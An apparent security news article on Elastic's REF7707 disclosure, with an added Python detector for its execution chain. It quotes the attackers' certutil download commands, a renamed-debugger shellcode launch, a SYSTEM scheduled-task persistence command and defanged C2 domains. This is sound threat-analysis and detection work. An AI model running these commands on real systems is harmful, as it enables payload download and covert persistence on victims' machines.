Elastic Security Labs has recently disclosed a sophisticated hacking campaign, dubbed "REF7707," that targets both Windows and Linux systems with novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER.
The campaign is notable both for its advanced tactics and for lapses in operational security that exposed additional adversary-owned infrastructure.
The REF7707 campaign was first identified in late November 2024, when Elastic Security Labs observed a cluster of endpoint behavioral alerts at the Foreign Ministry of a South American country.
The investigation uncovered a sprawling campaign with novel malware, sophisticated targeting, and a mature operating cadence.
Elastic Security Labs noted that, despite showing high technical competence in some areas, the attackers made tactical oversights that exposed pre-production malware samples and infrastructure.
The primary execution chain began with Microsoft's certutil utility being used to download files from a remote server, with commands like:
certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:\ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:\ProgramData
These commands were launched through Windows Remote Management's Remote Shell plugin (WinrsHost.exe), indicating that the attackers already held valid network credentials and were using them for lateral movement.
FINALDRAFT is a key component of the REF7707 intrusion set. It has both Windows and Linux variants, and it is delivered through an uncommon LOLBin (Living Off The Land Binary) tactic: the Windows-signed debugger CDB.exe, renamed fontdrvhost.exe, is used to execute malicious shellcode supplied through a weaponized config.ini file:
C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData
When no target parameter is provided, FINALDRAFT injects its shellcode into processes such as mspaint.exe or conhost.exe.
Persistence was achieved with a Scheduled Task that invokes fontdrvhost.exe every minute as SYSTEM:
schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM
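The three stages above (a certutil download, the renamed debugger, and a one-minute SYSTEM task launched from C:\ProgramData) each leave a distinct mark in process-creation telemetry. The following is an added example, not code from Elastic's report or from the REF7707 tooling: a small detector run over constructed Sysmon-style events. The event fields, the sample command lines, the placeholder host example.invalid and the list of writable paths are assumptions made for the example.

```python
"""
Added example (not from Elastic Security Labs or REF7707): walk constructed
Windows process-creation events, whose fields mirror Sysmon Event ID 1
(Image, OriginalFileName, CommandLine, ParentImage), and flag the three
stages of the execution chain described in the article.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str               # full path of the new process
    original_file_name: str  # OriginalFileName from the PE version resource
    command_line: str
    parent_image: str


# Constructed sample telemetry approximating the chain in the article.
# example.invalid is a placeholder host, not an indicator from the report.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
              r"certutil -urlcache -split -f https://example.invalid/fontdrvhost.exe C:\ProgramData",
              r"C:\Windows\System32\winrshost.exe"),
    ProcEvent(r"C:\ProgramData\fontdrvhost.exe", "CDB.Exe",
              r"C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe", "schtasks.exe",
              r'schtasks /create /RL HIGHEST /F /tn "\Microsoft\Windows\AppID\EPolicyManager\" /tr "C:\ProgramData\fontdrvhost.exe -cf C:\ProgramData\config.ini -o C:\ProgramData" /sc MINUTE /mo 1 /RU SYSTEM',
              r"C:\Windows\System32\winrshost.exe"),
    # Benign: a developer running cdb.exe under its own name from the SDK path.
    ProcEvent(r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe", "CDB.Exe",
              r"cdb.exe -p 4242", r"C:\Windows\explorer.exe"),
    # Benign: certutil used to dump a certificate, no download involved.
    ProcEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
              r"certutil -dump C:\temp\cert.cer", r"C:\Windows\System32\cmd.exe"),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def certutil_download(ev: ProcEvent) -> bool:
    """certutil acting as a downloader: -urlcache plus a URL on the command line."""
    cl = ev.command_line.lower()
    return (basename(ev.image) == "certutil.exe"
            and "-urlcache" in cl
            and re.search(r"https?://", cl) is not None)


def renamed_cdb(ev: ProcEvent) -> bool:
    """Renaming cdb.exe on disk does not change the PE's OriginalFileName."""
    return (ev.original_file_name.lower() == "cdb.exe"
            and basename(ev.image) != "cdb.exe")


def suspicious_schtask(ev: ProcEvent) -> bool:
    """A SYSTEM task firing every minute that runs a binary from a writable path."""
    cl = ev.command_line.lower()
    if basename(ev.image) != "schtasks.exe" or "/create" not in cl:
        return False
    every_minute = re.search(r"/sc\s+minute\s+/mo\s+1\b", cl) is not None
    as_system = re.search(r"/ru\s+system\b", cl) is not None
    # Assumed list of user-writable locations worth flagging.
    writable = re.search(r'/tr\s+"?[a-z]:\\(programdata|users\\public|windows\\temp)\\', cl)
    return every_minute and as_system and writable is not None


RULES = {
    "certutil_download": certutil_download,
    "renamed_cdb": renamed_cdb,
    "suspicious_schtask": suspicious_schtask,
}


def triage(events):
    """Return (rule name, image, command line) for every event matching a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev.image, ev.command_line))
    return hits


if __name__ == "__main__":
    for name, image, cl in triage(SAMPLE_EVENTS):
        print(f"[{name}] {image}\n    {cl}")
```

The OriginalFileName check is the one worth keeping in production: it catches the renamed debugger regardless of what the attacker calls the file, while a filename-only rule would miss it. The benign events show that cdb.exe run from its SDK path under its own name, and certutil used without -urlcache, produce no hits.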
FINALDRAFT establishes command and control using Microsoft’s Graph API, blending in with legitimate organizational traffic and evading network-based detection.
The campaign relies heavily on cloud and third-party services for command and control. Domains such as support.vmphere[.]com and update.hobiter[.]com, identified in the malware samples, are part of the adversary-owned infrastructure. In the REF7707 campaign the attackers leverage novel malware and abuse legitimate tools to evade detection.
The use of FINALDRAFT across both Windows and Linux platforms shows the need for robust cross-platform security measures.